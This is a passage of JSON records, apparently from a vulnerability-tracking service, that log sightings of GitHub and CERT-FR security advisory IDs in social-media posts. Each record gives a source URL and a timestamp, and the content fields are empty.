"author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq46-63pc-xfv9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942086561998142", "content": "", "creation_timestamp": "2025-02-03T21:31:04.717182Z"}, {"uuid": "434b2208-90df-46a2-80c7-dc630440de14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23c8-4wwr-g3c6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113908366252655454", "content": "", "creation_timestamp": "2025-01-28T22:35:34.770994Z"}, {"uuid": "473b6c68-d62e-4320-be3d-b6f2853f7879", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-003", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfaytoxf2d", "content": "", "creation_timestamp": "2025-01-29T16:28:50.361050Z"}, {"uuid": "5a1af05a-4e10-47f7-bbfc-9ad53103b39a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-010", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfdt7u7v2g", "content": "", "creation_timestamp": "2025-01-29T16:30:25.071523Z"}, {"uuid": "ea328e59-28d4-44c4-a9d1-b2b928d4e62c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cg75-ph7x-5rr9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113942099845540529", "content": "", "creation_timestamp": "2025-02-03T21:34:27.484470Z"}, {"uuid": "c7b44f91-0f24-437e-91f6-5223886985f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-005", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfcgzsvm2i", "content": "", "creation_timestamp": "2025-01-29T16:29:38.689663Z"}, {"uuid": "547b33cc-1e93-444b-aed8-a418ef843349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-001", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfgvcjy62y", "content": "", "creation_timestamp": "2025-01-29T16:32:08.050333Z"}, {"uuid": "95ca7df3-79d1-4af6-b17f-5faa4aec0449", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-006", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfcs4dhc2o", "content": "", "creation_timestamp": "2025-01-29T16:29:50.587231Z"}, {"uuid": "e02fbbd7-5c16-4002-92c1-523c6a1d918f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r3fp-xr9f-wv38", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113942107867829427", "content": "", "creation_timestamp": "2025-02-03T21:36:29.856030Z"}, {"uuid": "47cc1f94-d7f0-4671-bbf9-698599693a43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-007", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfcvdp552g", "content": "", "creation_timestamp": "2025-01-29T16:29:53.665185Z"}, {"uuid": "04cf6911-1da5-4499-b80b-c5c4a848e1a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-008", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfdgoa6s2o", "content": "", "creation_timestamp": "2025-01-29T16:30:11.965071Z"}, {"uuid": "8ea1890d-8368-48de-b373-7ce4048565d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3lhcjbeacsu2a", "content": "", "creation_timestamp": "2025-02-03T21:45:14.776083Z"}, {"uuid": "264fcd90-1b3a-4af3-ac81-e38b6b961a23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qjc6-5qv6-fr8m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942157445800706", "content": "", "creation_timestamp": "2025-02-03T21:49:06.403594Z"}, {"uuid": "dec7e586-e5ee-4f30-9bb0-d02916933c98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-009", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfdmifgf2q", "content": "", "creation_timestamp": "2025-01-29T16:30:18.041761Z"}, {"uuid": "e352e1a5-ed8b-47e6-9821-aa2fd89163f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-002", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfgz33rl2a", "content": "", "creation_timestamp": "2025-01-29T16:32:11.763280Z"}, {"uuid": "0e605711-b2b2-4343-8951-d509c5b6a526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jp48-94wm-3gmc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942157415675948", "content": "", "creation_timestamp": "2025-02-03T21:49:05.903000Z"}, {"uuid": "df30e19f-78a3-465a-a115-8c1a3d9324d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c76h-2ccp-4975", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lgmegl3kq32k", "content": "", "creation_timestamp": "2025-01-26T02:20:06.009171Z"}, {"uuid": "ebc84c68-1aaf-4c9b-ae4b-84ede95ced4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-011", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfdwcg6d2a", "content": "", "creation_timestamp": "2025-01-29T16:30:28.249103Z"}, {"uuid": "95310d21-2500-443a-8251-d5c21f923a8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pg73-w9vx-8mgp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942157431197650", "content": "", "creation_timestamp": "2025-02-03T21:49:06.137162Z"}, {"uuid": "5167d01b-cf52-4029-a477-1c2e46093990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jpph-g9p7-9jrm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942157461874885", "content": "", "creation_timestamp": "2025-02-03T21:49:06.577579Z"}, {"uuid": "21575270-5e6e-455a-823d-aa91a1d9b63b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36gq-35j3-p9r9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113878382100891566", "content": "", "creation_timestamp": "2025-01-23T15:30:12.416031Z"}, {"uuid": "8bb6e3ee-08df-465e-bffa-9c4f823a648b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-012", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfendsgx2k", "content": "", "creation_timestamp": "2025-01-29T16:30:52.521748Z"}, {"uuid": "12fcbdc7-877b-4475-8d22-80323bbb6541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-003", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfh4ryhl2a", "content": "", "creation_timestamp": "2025-01-29T16:32:15.680345Z"}, {"uuid": "5d2c9e35-eb24-4a10-bcc4-53fb0cb2bb55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-014", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfkjss2227", "content": "", "creation_timestamp": "2025-01-29T16:34:10.041690Z"}, {"uuid": "0b61260d-4582-4fb3-8e33-8f70151260ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-018", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfmaveza2y", "content": "", "creation_timestamp": "2025-01-29T16:35:07.787174Z"}, {"uuid": "ed24f7a9-677c-4f19-92a3-e8097ecee0ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x28g-6228-99p9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942216465394142", "content": "", "creation_timestamp": "2025-02-03T22:04:06.989841Z"}, {"uuid": "d26ab59e-32c7-46fb-a74b-0dad1a535b25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c76h-2ccp-4975", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lgmfljjbmo2w", "content": "", "creation_timestamp": "2025-01-26T02:40:45.873807Z"}, {"uuid": "c783f284-87e3-4b45-891e-11a77a7d38f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-013", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvffduiaw2o", "content": "", "creation_timestamp": "2025-01-29T16:31:16.115265Z"}, {"uuid": "cdb27a09-6b15-4cb9-a05a-792b6a2bd134", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2mhx-5998-46hx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942216479395985", "content": "", "creation_timestamp": "2025-02-03T22:04:07.273721Z"}, {"uuid": "1cb7a62f-aba2-450c-b1ac-3e8311d8ef0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2019-ALE-014", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvffo5kah2k", "content": "", "creation_timestamp": "2025-01-29T16:31:26.822722Z"}, {"uuid": "9ca6b7ba-6e36-4dd0-934a-64d21be54d28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-004", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfhdzofo2o", "content": "", "creation_timestamp": "2025-01-29T16:32:23.353146Z"}, {"uuid": "2f29975a-19af-453c-b18c-040e614f3baa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-022", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfovrb7q2y", "content": "", "creation_timestamp": "2025-01-29T16:36:36.846765Z"}, {"uuid": "a984119a-eced-4ba5-b26a-5518af90b294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-013", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfkcpwbk27", "content": "", "creation_timestamp": "2025-01-29T16:34:03.079703Z"}, {"uuid": "a5234c1a-3be2-4dcc-ba3b-bf953c394aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-015", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfknahzv22", "content": "", "creation_timestamp": "2025-01-29T16:34:13.641727Z"}, {"uuid": "9b2fce12-b7fb-48c0-914c-f11c4173db89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wg33-5h85-7q5p", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113958231450838584", "content": "", "creation_timestamp": "2025-02-06T17:56:56.330387Z"}, {"uuid": "17458572-72d2-474b-b64a-bc3c7ad8e989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-019", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfn4klr522", "content": "", "creation_timestamp": "2025-01-29T16:35:36.762439Z"}, {"uuid": "f6d22894-8125-4758-b80c-6c3f75b395e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2020-ALE-021", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfnoodux2k", "content": "", "creation_timestamp": "2025-01-29T16:35:56.226408Z"}, {"uuid": "f0c18b7a-b19b-4a61-a076-0ad7bd75ee06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8w24-gfgq-jg72", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113884118072683940", "content": "", "creation_timestamp": "2025-01-24T15:48:55.671801Z"}, {"uuid": "7bac9976-c244-4348-b9bb-6e17218b94a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-003", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfxrxuqp2t", "content": "", "creation_timestamp": "2025-01-29T16:41:35.098208Z"}, {"uuid": "61423689-c1d3-4aab-bd8b-5baddac6087e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-004", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvfzm5n3c27", "content": "", "creation_timestamp": "2025-01-29T16:42:35.942401Z"}, {"uuid": "e0a6ddd0-52e2-4226-95d9-cb92d658433c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-009", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvg7ltm3o2o", "content": "", "creation_timestamp": "2025-01-29T16:45:57.166731Z"}, {"uuid": "0a3295f9-9d5c-436a-8fe7-6fd44cfa5e2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qmxm-wvm9-wvxx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113884286717742726", "content": "", "creation_timestamp": "2025-01-24T16:31:49.213644Z"}, {"uuid": "b8be4ab9-8a03-4e10-a032-e167dc22c97e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pmr2-2r83-h3cv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113942353419505369", "content": "", "creation_timestamp": "2025-02-03T22:38:56.627171Z"}, {"uuid": "56886f54-a5b9-407d-9802-be31e8b8bcdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-648q-8m78-5cwv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113942353419505369", "content": "", "creation_timestamp": "2025-02-03T22:38:56.728067Z"}, {"uuid": "1e79ef42-52ca-43f4-9d3e-d3642317e2c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56w8-8ppj-2p4f", "type": "seen", "source": "https://bsky.app/profile/xeiaso.net/post/3lgogtwtqxp26", "content": "", "creation_timestamp": "2025-01-26T22:08:41.420602Z"}, {"uuid": "b88b3be7-9ba3-4dc1-b6a4-22b81421d35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56w8-8ppj-2p4f", "type": "seen", "source": "https://bsky.app/profile/cadey.pony.social.ap.brid.gy/post/3lgogvsvnfec2", "content": "", "creation_timestamp": "2025-01-26T22:09:53.421230Z"}, {"uuid": "174e8d9a-7c08-43f4-abe8-934a72b8eb21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q53r-9hh9-w277", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113906310831815558", "content": "", "creation_timestamp": "2025-01-28T13:52:50.385169Z"}, {"uuid": "b32ed8c4-688d-4364-8e3f-fc3caaa4305f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hpq-3g6w-pvhf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113912895243480427", "content": "", "creation_timestamp": "2025-01-29T17:47:20.566825Z"}, {"uuid": "73ae3a21-e064-44d3-b170-da3b7b6994c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27c6-mcxv-x3fh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113878900944416033", "content": "", "creation_timestamp": "2025-01-23T17:42:08.653197Z"}, {"uuid": "c80f7255-4634-49f1-932a-c2b8527e4db4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p989-2f5w-9cf6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113878900958899354", "content": "", "creation_timestamp": "2025-01-23T17:42:08.999992Z"}, {"uuid": "51741da3-46e1-4a3a-8b7d-970863c25a8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c76h-2ccp-4975", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3lgn4jhna4p2g", "content": "", "creation_timestamp": "2025-01-26T09:31:13.630032Z"}, {"uuid": "d8ee0485-9eb0-4abd-b55a-d3295e292beb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xcpx-h22f-m42v", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-c9826325-5c6ea68eb999f067", "content": "", "creation_timestamp": "2025-01-24T19:11:01.506950Z"}, {"uuid": "8398e79b-95f0-4c23-8ec4-86e379bfbc65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-23C8-4WWR-G3C6", "type": "seen", "source": "https://t.me/brutsecurity/1466", "content": "", "creation_timestamp": "2026-07-09T03:00:09.761895Z"}, {"uuid": "de2c5a9b-e5fc-4c96-a90f-c1e1cd0ecd75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r2x6-cjg7-8r43", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113913558925506767", "content": "", "creation_timestamp": "2025-01-29T20:36:07.587845Z"}, {"uuid": "d7184f19-ff0f-432e-909d-3f1fab601d04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxqq-w3x5-7ph3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113952756172745897", "content": "", "creation_timestamp": "2025-02-05T18:44:30.052207Z"}, {"uuid": "6ff297db-05e1-452d-ad34-6efd4540e515", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrm8-xgf3-fwqr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113952756187471780", "content": "", "creation_timestamp": "2025-02-05T18:44:30.322369Z"}, {"uuid": "d8004b74-a601-402f-8cd9-7cce846127f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79f6-p65j-3m2m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113952756201766643", "content": "", "creation_timestamp": "2025-02-05T18:44:30.566112Z"}, {"uuid": "4a39c538-ee2d-4360-bf68-d0010db3ee7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j2hp-6m75-v4j4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901499013466426", "content": "", "creation_timestamp": "2025-01-27T17:29:07.957501Z"}, {"uuid": "b59b816a-807e-4905-a3ab-1bb72ab83dc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98vm-2xqm-xrcc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113787932671356345", "content": "", "creation_timestamp": "2025-01-07T16:07:44.040830Z"}, {"uuid": "40eb3e60-71f9-45c3-a4ea-11ad85e225f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9f69-p73j-m73x", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804747142398699", "content": "", "creation_timestamp": "2025-01-10T15:23:51.358554Z"}, {"uuid": "1b938693-5dcc-46c4-a66b-3011e62b5e23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgjm-6p59-537v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804779585524856", "content": "", "creation_timestamp": "2025-01-10T15:32:06.503297Z"}, {"uuid": "94fa33d3-0bc3-44eb-bbf5-dd2e804c64d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcj3-gqj3-rrvm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804779601066352", "content": "", "creation_timestamp": "2025-01-10T15:32:06.798390Z"}, {"uuid": "8bddf085-af56-4692-b638-366d6b652566", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xf7j-4x67-6h93", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823205963235371", "content": "", "creation_timestamp": "2025-01-13T21:38:13.048737Z"}, {"uuid": "e7f59740-96b6-4bc9-a4b6-dc0457967763", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mgj3-g922-2r9v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804779615596755", "content": "", "creation_timestamp": "2025-01-10T15:32:07.147505Z"}, {"uuid": "d58805c5-b395-4ce2-85f8-76807451ce4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32q6-rr98-cjqv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823205947381993", "content": "", "creation_timestamp": "2025-01-13T21:38:13.247207Z"}, {"uuid": "83fd6ae3-1630-44ce-9bf5-a0f5858e69ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9x2j-pw3h-p53f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804779630653898", "content": "", "creation_timestamp": "2025-01-10T15:32:07.303709Z"}, {"uuid": "30ef9fda-633a-4c46-bd92-3c43651c447b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qjh3-4j3h-vmwp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823227726464727", "content": "", "creation_timestamp": "2025-01-13T21:43:42.973442Z"}, {"uuid": "3e3ccecf-379d-4b72-a27c-bb719215a3d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45v3-38pc-874v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823227741082612", "content": "", "creation_timestamp": "2025-01-13T21:43:43.408707Z"}, {"uuid": "83eeea38-e634-426b-a2f4-16b5a222207e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7jjc-gg6m-3329", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113833796685369395", "content": "", "creation_timestamp": "2025-01-15T18:31:32.567594Z"}, {"uuid": "1ce9a788-698d-4be8-8e2a-bc6a6870c949", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5xh2-23cc-5jc6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113799964021202828", "content": "", "creation_timestamp": "2025-01-09T19:07:26.838986Z"}, {"uuid": "f109a31c-2f8f-484a-8957-930920a2d6c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgjm-6p59-537v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804792773660712", "content": "", "creation_timestamp": "2025-01-10T15:35:27.695874Z"}, {"uuid": "d4e4276a-708c-4371-9f88-5bd0a03fbf58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5xg8-xhfj-4hm6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113839687252021271", "content": "", "creation_timestamp": "2025-01-16T19:29:35.606193Z"}, {"uuid": "5372f445-9313-40a4-b146-23d4ec4e495d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcj3-gqj3-rrvm", "type": "seen", "source": 